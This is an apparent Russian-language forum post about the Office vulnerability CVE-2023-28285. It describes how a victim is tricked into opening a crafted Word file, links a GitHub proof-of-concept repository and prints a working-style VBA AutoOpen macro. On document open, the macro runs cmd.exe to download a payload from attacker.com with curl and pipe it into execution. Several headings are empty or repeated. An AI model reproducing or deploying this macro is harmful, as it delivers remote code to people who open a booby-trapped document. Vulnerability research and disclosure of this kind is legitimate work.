Описание:
Видео:
POC:
Сама атака выполняется локально пользователем, прошедшим аутентификацию в целевой системе. Злоумышленник может воспользоваться уязвимостью CVE-2023-28285, после того как убедит жертву с помощью социальной инженерии загрузить и открыть специально созданный файл с веб-сайта, что может привести к локальной атаке на компьютер жертвы. Злоумышленник может убедить жертву открыть вредоносную веб-страницу, используя вредоносный файл Word для API Office-365. После того, как пользователь откроет файл для чтения, из API Office-365, будет активирован код с вредоносного сервера без уведомления пользователя.
Видео:
POC:
![]()
CVE-mitre/2023/CVE-2023-28285 at main · nu11secur1ty/CVE-mitre
https://cve.mitre.org/. Contribute to nu11secur1ty/CVE-mitre development by creating an account on GitHub.github.com
Код:
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s http://attacker.com/CVE-2023-28285/PoC.debelui | debelui", vbNormalFocus)
End Sub